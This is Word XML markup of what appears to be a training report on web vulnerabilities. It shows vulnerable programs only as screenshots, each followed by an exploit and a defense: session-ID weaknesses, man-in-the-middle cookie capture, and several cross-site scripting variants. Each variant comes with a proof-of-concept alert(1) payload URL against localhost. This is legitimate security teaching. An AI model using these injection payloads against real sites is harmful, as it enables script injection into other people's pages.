    <w:p w:rsidR="001C1770" w:rsidRDefault="001C1770" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C1770" w:rsidRDefault="001C1770" w:rsidP="001C1770">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE1DDD" w:rsidRPr="00FE1DDD" w:rsidRDefault="00FE1DDD" w:rsidP="00FE1DDD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB7A21F" wp14:editId="111D30DC">
            <wp:extent cx="2428875" cy="43815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70" w:rsidRPr="00C63279" w:rsidRDefault="00FE1DDD" w:rsidP="00361FA4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Change the session ID algorithm in order to have a proper session ID</w:t>
      </w:r>
      <w:r w:rsidR="00361FA4">
        <w:t>, use a good PRGA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r w:rsidRPr="00966DE2">
        <w:t>Session Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (part </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidR="00A45E65">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AA2BF2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MiTM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="6"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45E65" w:rsidRPr="00A45E65" w:rsidRDefault="00A45E65" w:rsidP="00A45E65"/>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00AA2BF2" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C518E1B" wp14:editId="3FC586BD">
            <wp:extent cx="5731510" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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77" w:rsidRDefault="00D45E21" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre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34D599">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>397510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>249555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2942590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom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A77">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D45E21" w:rsidRDefault="00D45E21" w:rsidP="00D45E21"/>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00D45E21" w:rsidP="008A6229">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We have the PHPSESSID if we do a man in the middle attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B726ED" w:rsidRDefault="00B726ED" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00AA2BF2" w:rsidP="00C26A77">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D2F231" wp14:editId="063FEC26">
            <wp:extent cx="5731510" cy="930275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175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77" w:rsidRDefault="00AA2BF2" w:rsidP="005E1C1B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We use the Secure cookie policy</w:t>
      </w:r>
      <w:r w:rsidR="005E1C1B">
        <w:t>. In HTTPS, doing a MiTM won’t wor</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="005E1C1B">
        <w:t>k anymore to see the PHPSESSID.</w:t>
      </w:r>
      <w:r w:rsidR="00C26A77">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>DOM-based XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2B00FE" wp14:editId="191338AE">
            <wp:extent cx="4810125" cy="189547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77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRPr="007E128B" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Go to http://127.0.0.1/</w:t>
      </w:r>
      <w:r w:rsidR="004D5FD0">
        <w:t>index.php?price=</w:t>
      </w:r>
      <w:r w:rsidR="004D5FD0" w:rsidRPr="004D5FD0">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="004D5FD0">
        <w:t>&gt;&lt;script&gt;alert(1) ;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A77">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26A77" w:rsidRPr="00FE1DDD" w:rsidRDefault="00777337" w:rsidP="00C26A77">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BBD159" wp14:editId="1462F58E">
            <wp:extent cx="6065435" cy="295275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3566" cy="29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20" w:rsidRDefault="00461F20">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="00884B9E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:t xml:space="preserve"> (in commentary)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="8"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59EE5F50" wp14:editId="1FE53AD2">
            <wp:extent cx="3429000" cy="139065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20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRPr="007E128B" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Go to http://127.0.0.1/index.php?price=</w:t>
      </w:r>
      <w:r>
        <w:t>--&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;script&gt;alert(1) ;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRPr="00FE1DDD" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA6E464" wp14:editId="5196B03A">
            <wp:extent cx="3733800" cy="13906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9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – 1 (in </w:t>
      </w:r>
      <w:r w:rsidR="001F1911">
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="9"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRDefault="001F1911" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685F5213" wp14:editId="48D4C6B7">
            <wp:extent cx="2762250" cy="609600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9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRPr="007E128B" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Go to http://127.0.0.1/index.php?price=</w:t>
      </w:r>
      <w:r w:rsidR="001F1911">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>script&gt;alert(1) ;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00884B9E" w:rsidRPr="00FE1DDD" w:rsidRDefault="001F1911" w:rsidP="00884B9E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB33A51" wp14:editId="65818FF3">
            <wp:extent cx="4162425" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20"/>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="00884B9E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C956DC">
        <w:t xml:space="preserve"> (in attributes)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="10"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00C956DC" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D64717" wp14:editId="24FAF4C2">
            <wp:extent cx="4400550" cy="10668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20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRPr="007E128B" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00C956DC" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price</w:t>
        </w:r>
        <w:r w:rsidR="00C956DC" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C956DC" w:rsidRPr="00C956DC">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00A96587">
        <w:t>&gt;&lt;/h4&gt;&lt;script&gt;alert(1);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="00C956DC" w:rsidP="00461F20">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6BEF2D" wp14:editId="5C7D3F89">
            <wp:extent cx="3209925" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="9525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4C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (in attributes) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="11"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="416CDCBC" wp14:editId="4B342575">
            <wp:extent cx="4010025" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="9525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4C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRPr="007E128B" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=</w:t>
        </w:r>
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>; alert(3) ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377B6A46" wp14:editId="22AE84CC">
            <wp:extent cx="3686175" cy="1781175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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4C" w:rsidRDefault="003C404C" w:rsidP="003C404C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660"/>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="003C404C">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (in </w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="12"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="390F2736" wp14:editId="66D4DD12">
            <wp:extent cx="3638550" cy="92392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60" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=javascript:alert(1)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Or go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=</w:t>
        </w:r>
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>red;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">}&lt;/style&gt;&lt;script&gt;alert(1)&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRPr="007E128B" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRPr="00FE1DDD" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6915F6AB" wp14:editId="357E3AFF">
            <wp:extent cx="4991100" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="0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20" w:rsidRPr="00FE1DDD" w:rsidRDefault="00461F20" w:rsidP="00461F20">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="00461F20" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="003C404C">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:t xml:space="preserve"> (in </w:t>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:t>href</w:t>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="005F7660">
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="13"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45A972AC" wp14:editId="04448FA3">
            <wp:extent cx="3380952" cy="876190"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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60" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
